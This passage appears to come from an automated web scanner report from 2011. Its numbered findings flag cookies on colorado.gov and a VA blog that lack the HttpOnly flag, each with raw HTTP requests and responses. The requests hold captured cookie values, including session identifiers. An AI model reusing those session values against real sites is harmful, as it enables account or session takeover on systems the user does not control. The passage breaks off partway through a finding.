Host:   http://www.blogs.va.gov
Path:   /VAntage/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAntage/ HTTP/1.1
Host: www.blogs.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:25:18 GMT
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.blogs.va.gov/VAntage/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS6ae993=ae4e3cc522f21e76a47c42b6ecf463b3342e156c215790994dbc00b9; Max-Age=900; Path=/
Content-Length: 52649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...

14.460. http://www.colorado.gov/cms/coloradogov/images/bgrd_bulletBlue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_bulletBlue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_bulletBlue.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030; JSESSIONID=cx3hS880vVX_KdjjM_; BIGipServer=BiFPL5JoVeDod4AHgshLK90xd+63v3peA8ZTSM2rKMnDYWoxyqA+/BPR9lH3JnCE2BJL8yIaqMon8w==

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
Last-Modified: Thu, 25 Mar 2010 20:57:10 GMT
ETag: "8c2b7e-104-482a64a535580"
Accept-Ranges: bytes
Content-Length: 260
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89a..........P.....\..*j.*n.....{........J..9..*..*..;..Q..G..B....*..*h.*..3.......*q.H........F..]..........................................................................................
...[SNIP]...

14.461. http://www.colorado.gov/cms/coloradogov/images/bgrd_callBoxGray.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_callBoxGray.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_callBoxGray.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:01 GMT
Server: Apache
Last-Modified: Tue, 04 Mar 2008 17:48:11 GMT
ETag: "66001d-79-447a01ba54cc0"
Accept-Ranges: bytes
Content-Length: 121
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a.._....................................................!.......,......_...&..I..8_.;/ 8.Ji*BJ.I...!..b....M....0..;

14.462. http://www.colorado.gov/cms/coloradogov/images/bgrd_cbe3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_cbe3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_cbe3.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:01 GMT
Server: Apache
Last-Modified: Fri, 30 Jan 2009 22:30:54 GMT
ETag: "66001e-112c7-461bac208a380"
Accept-Ranges: bytes
Content-Length: 70343
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a.    x............m................................................llp...y.R.......:[........l.........Cj.......u.....................Ff......z.{..........................................Uw........
...[SNIP]...

14.463. http://www.colorado.gov/cms/coloradogov/images/bgrd_lottoBack2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_lottoBack2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_lottoBack2.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:04 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:05 GMT
ETag: "6600dd-14af-48a1aa393d540"
Accept-Ranges: bytes
Content-Length: 5295
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a..8...............................................................................................................................................................................................
...[SNIP]...

14.464. http://www.colorado.gov/cms/coloradogov/images/bgrd_stateLegTabSeal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_stateLegTabSeal.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_stateLegTabSeal.png HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030; JSESSIONID=cx3hS880vVX_KdjjM_; BIGipServer=BiFPL5JoVeDod4AHgshLK90xd+63v3peA8ZTSM2rKMnDYWoxyqA+/BPR9lH3JnCE2BJL8yIaqMon8w==

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
Last-Modified: Thu, 25 Mar 2010 20:57:11 GMT
ETag: "8c3c0b-4bf4-482a64a6297c0"
Accept-Ranges: bytes
Content-Length: 19444
Content-Type: image/png
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE..............................j.............................................................................s.............
...[SNIP]...

14.465. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel-dash.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_tabPanel-dash.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_tabPanel-dash.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:53 GMT
Server: Apache
Last-Modified: Tue, 04 Mar 2008 17:49:40 GMT
ETag: "8c14bb-2b-447a020f35500"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89a.............!.......,............P.;

14.466. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_tabPanel2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_tabPanel2.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:53 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 14:16:40 GMT
ETag: "660032-4bb-46beb01e34200"
Accept-Ranges: bytes
Content-Length: 1211
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

14.467. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/bgrd_tabPanel4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/bgrd_tabPanel4.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:55 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 22:50:27 GMT
ETag: "660034-1e9-46bf22f51f2c0"
Accept-Ranges: bytes
Content-Length: 489
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

14.468. http://www.colorado.gov/cms/coloradogov/images/img_cash5Short.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_cash5Short.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_cash5Short.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:04 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:07 GMT
ETag: "6600de-b7f-48a1aa3b259c0"
Accept-Ranges: bytes
Content-Length: 2943
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a..d....../..2..4..,..!.....3....."..*........-..).....+...../..#..$.....1..0..3..............%.................'.....,..(........&..1........"..<...........>........6..8.....B........F........6.
...[SNIP]...

14.469. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_leftArrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_leftArrow.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:06 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:09 GMT
ETag: "8c66a3-a44-48a1aa3d0de40"
Accept-Ranges: bytes
Content-Length: 2628
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89a..d......S.................... ....u............Y..Yj..........u..e
....`.....T..F.....V..y.m...e.................i........s..............".......q..... ..b..........................O........}.
...[SNIP]...

14.470. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow_disable.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_leftArrow_disable.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_leftArrow_disable.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:06 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:08 GMT
ETag: "6600e1-a4c-48a1aa3c19c00"
Accept-Ranges: bytes
Content-Length: 2636
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a..d.........F.....V..y..d.................i........u..s..............".....p..... ..b..........................O...........}.....l..X..k........Z........^..k.."...........X........r..\..........
...[SNIP]...

14.471. http://www.colorado.gov/cms/coloradogov/images/img_lottoBall.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_lottoBall.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_lottoBall.png HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:04 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:04 GMT
ETag: "660009-345-48a1aa3849300"
Accept-Ranges: bytes
Content-Length: 837
Content-Type: image/png
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

.PNG
.
...IHDR....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx....K.Q.....]........F&RA...CEP ..eo...?P.$..ABD=........."..V0.._.P.[.8.3so...3;..._...s>s~...V...]B....>..f.kk.......
...[SNIP]...

14.472. http://www.colorado.gov/cms/coloradogov/images/img_lottoBallGreen.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_lottoBallGreen.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_lottoBallGreen.png HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:04 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:03 GMT
ETag: "66000b-334-48a1aa37550c0"
Accept-Ranges: bytes
Content-Length: 820
Content-Type: image/png
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

.PNG
.
...IHDR.............rP6.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....O.A..g....hC.J.C.A..o.<`.'.xP....1z..G....b.1........("..Q.................R%..y...w~3........P..1p..?.W.p...n.....P.
...[SNIP]...

14.473. http://www.colorado.gov/cms/coloradogov/images/img_lottoShort.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_lottoShort.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_lottoShort.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:04 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:01 GMT
ETag: "8c66aa-a92-48a1aa356cc40"
Accept-Ranges: bytes
Content-Length: 2706
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89a..d.............
..
..........................................................    ..............................................    .............7..'..(........0.....K........~.....k..&..[..2.....#
...[SNIP]...

14.474. http://www.colorado.gov/cms/coloradogov/images/img_matchplayShort.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_matchplayShort.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_matchplayShort.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:06 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:07 GMT
ETag: "6600e8-d42-48a1aa3b259c0"
Accept-Ranges: bytes
Content-Length: 3394
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a..d.....n.....L........p..l..g.....Q...............u.....j..U..e.......z.h.    ]..T..V..S..}..w..{.
^.g..s..~.....v..p..r..R.
`.    \.....Z.....X..o..y..b..a..m.....Y.....k..d.............R..&..!..
...[SNIP]...

14.475. http://www.colorado.gov/cms/coloradogov/images/img_megamillionsShort.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_megamillionsShort.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_megamillionsShort.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:06 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:06 GMT
ETag: "66000e-c29-48a1aa3a31780"
Accept-Ranges: bytes
Content-Length: 3113
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89a..d......K..;.............................................................................................................................    .....%................................6.....0.....)..
.
...[SNIP]...

14.476. http://www.colorado.gov/cms/coloradogov/images/img_powerballShort.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_powerballShort.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_powerballShort.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:04 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:08 GMT
ETag: "8c66ad-e4b-48a1aa3c19c00"
Accept-Ranges: bytes
Content-Length: 3659
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89a..d...............$.................................................................    ..
..    .....
..........    ..    .
..
..
.................................................................#..$..%.
...[SNIP]...

14.477. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_rightArrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

